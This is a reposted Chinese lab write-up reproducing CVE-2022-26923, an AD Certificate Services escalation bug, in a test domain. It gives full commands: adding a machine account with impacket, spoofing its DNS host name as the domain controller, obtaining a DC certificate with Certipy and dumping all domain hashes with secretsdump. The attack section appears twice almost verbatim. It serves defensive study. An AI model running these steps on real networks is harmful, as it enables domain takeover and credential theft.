IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> CVE-2022-26923域权限提升漏洞复现 -> 正文阅读

[网络协议]CVE-2022-26923域权限提升漏洞复现

本文首发于蛇矛实验室:https://mp.weixin.qq.com/s/AuPajld1K7N5alAkgMZNfA

环境搭建

域控

选择一台winserver2016搭建域控服务,这里是winserver2016。选择Active Directory
域服务,其他默认即可。

在这里插入图片描述

在这里插入图片描述

安装完成之后,提升为域控制器,开始配置域控。

添加新林rangenet.cn,其他默认,然后一步步到安装完成。

在这里插入图片描述

在这里插入图片描述

ADCS搭建

下面正式开始安装ADCS服务,只需要注意下面截图的内容,其他都是默认。

服务器管理器–>添加角色和功能向导–>勾选服务器角色–>Active Director 证书服务

在这里插入图片描述

在这里插入图片描述

开始安装

在这里插入图片描述

配置ADCS服务,只需要注意下面截图的内容,其他都是默认。

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

新建低权限AD用户

创建低权限AD用户Zhangfei:ZFpassword@123

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

工具

https://github.com/SecureAuthCorp/impacket

https://github.com/ly4k/Certipy

https://github.com/CravateRouge/bloodyAD

测试复现

配置 DNS

修改kali的/etc/hosts文件并添加以下条目:

在这里插入图片描述

域内定位CA机器

在域内机器上执行,为了方便这里在域控中执行

certutil -config - -ping

在这里插入图片描述

测试证书生成

首先使用用户证书模板为我们的低权限AD用户 (Username=zhangfei
Password=ZFpassword@123) 生成证书:

certipy req ‘rangenet.cn/zhangfei:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template User

在这里插入图片描述

验证此证书是否有效

certipy auth -pfx zhangfei.pfx

在这里插入图片描述

创建机器账户到域

我们需要向域中添加一台新计算机以生成机器证书。我们不必将物理计算机添加到网络中。我们可以使用Impacket的addcomputer.py脚本让它看起来像我们正在添加一台新计算机:

addcomputer.py ‘rangenet.cn/zhangfei:ZFpassword@123’ -method LDAPS
-computer-name ‘zhangfeiPC’ -computer-pass ‘ZFpassword@123’

在这里插入图片描述

参数说明:

  • Rangenet.cn/zhangfei:ZFpassword@123 有效的 AD 凭据才能添加新计算机。

  • Method 身份验证方法。LDAPS 将与域控制器上的 LDAP 服务交互。

  • computer-name 计算机的名称,可以随便起。

  • computer-pass 与我计算机的机器帐户关联的密码。也可以随便起。

请求机器证书

们创建的新计算机生成一个证书。要使用该计算机的机器帐户,您需要在名称末尾添加一个“$”:

certipy req ‘rangenet.cn/zhangfeiPC$:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template Machine

在这里插入图片描述

Certipy验证证书是否有效,获取到哈希,证明有效:

certipy auth -pfx zhangfeipc.pfx

在这里插入图片描述

更新 DNS 主机名和 SPN 属性

使用Get-ADCompute命令查看AD对象中DNS主机名和SPN:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-x95o8xv2-1653633893829)(media/e595db34146f1e526f31ef46b4a13eb3.png)]

首先删除我们当前的 SPN 属性:

Set-ADComputer zhangfeiPC -ServicePrincipalName @{}

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5mdNDxHI-1653633893829)(media/5a63d5a5b51830daee9c6419987b927c.png)]

使用Set-ADComputer cmdlet将DNS主机名属性更新为DC的属性

Set-ADComputer zhangfeiPC -DnsHostName DC.rangenet.cn

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9lXWjJjE-1653633893830)(media/7069118c7a325a058b7e216257ecc1d7.png)]

验证是否进行了更改,可以看到已经成功更改DNSHostName为dc.rangenet.cn

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vT6gQ9lq-1653633893831)(media/732e9ee58e7d687856cddd6db3b7d479.png)]

伪造恶意证书

再次运行Certipy的相同命令来重新生成机器证书,可以看到DNS Host
Name已经变成了dc.rangenet.cn:

certipy req ‘rangenet.cn/zhangfeiPC$:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template Machine

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fFwfQXOY-1653633893831)(media/78df598c98cc6ad65db26f0f6ca63512.png)]

再次验证证书是否有效,成功获取到哈希:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-lRjW86WW-1653633893831)(media/391b8df4baf4226d64c7a7de5754ac87.png)]

转储所有用户哈希

这里使用impacket的secretsdump.py来dump哈希

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-W6hOjigL-1653633893832)(media/f185103d20e8f4bac3a3f4457bf4cf1d.png)]

攻击复现

配置 DNS

修改kali的/etc/hosts文件并添加以下条目:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6sDUnQGr-1653633893832)(media/e3b15b991e92f533456103ccacfc1e89.png)]

域内定位CA机器

在域内机器上执行,为了方便这里在域控中执行

certutil -config - -ping

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4Glg5zh0-1653633893832)(media/bdc3d13651336d9d34cd306b8a944a56.png)]

测试证书生成

首先使用用户证书模板为我们的低权限AD用户 (Username=zhangfei
Password=ZFpassword@123) 生成证书:

certipy req ‘rangenet.cn/zhangfei:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template User

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-wsr8p8qR-1653633893833)(media/08040541c753a2b01f8a9930c0b72564.png)]

验证此证书是否有效

certipy auth -pfx zhangfei.pfx

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XUXFli0q-1653633893833)(media/e7a86e4745906cc308b7217a27d84785.png)]

创建机器账户到域

使用bloodyAD工具来创建机器账户。

查看ms-DS-MachineAccountQuota属性,如果ms-DS-MachineAccountQuota>0就可以创建机器帐户

在这里插入图片描述

在LDAP中创建一个机器帐户

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-yOKjzIR6-1653633893833)(media/a7a0f972f8438b01d59766ebc396a8c5.png)]

更新机器帐户的DNS HostName

将机器帐户的DNS Host Name改为域控的DC.rangenet.cn

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-6PyeGLMb-1653633893834)(media/90615aaafccab8dcca504c88992349a9.png)]

查看属性,是否成功更改了DNS Host Name

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-9agW4zVZ-1653633893834)(media/fb5b7a530f3bd3440192b2f1d9fff447.png)]

伪造恶意证书

运行Certipy来重新生成机器证书,可以看到DNS Host Name已经变成了dc.rangenet.cn:

certipy req ‘rangenet.cn/zhangfeiPC$:ZFpassword@123@dc.rangenet.cn’ -ca
RANGENET-DC-CA -template Machine

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-rqCCMYGr-1653633893834)(media/78df598c98cc6ad65db26f0f6ca63512.png)]

再次验证证书是否有效,成功获取到哈希:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-2hwzByUz-1653633893835)(media/391b8df4baf4226d64c7a7de5754ac87.png)]

转储所有用户哈希

这里使用impacket的secretsdump.py来dump哈希

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-isYJiMKa-1653633893835)(media/f185103d20e8f4bac3a3f4457bf4cf1d.png)]

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-06-01 15:28:43  更:2022-06-01 15:29:27 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 0:22:35-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码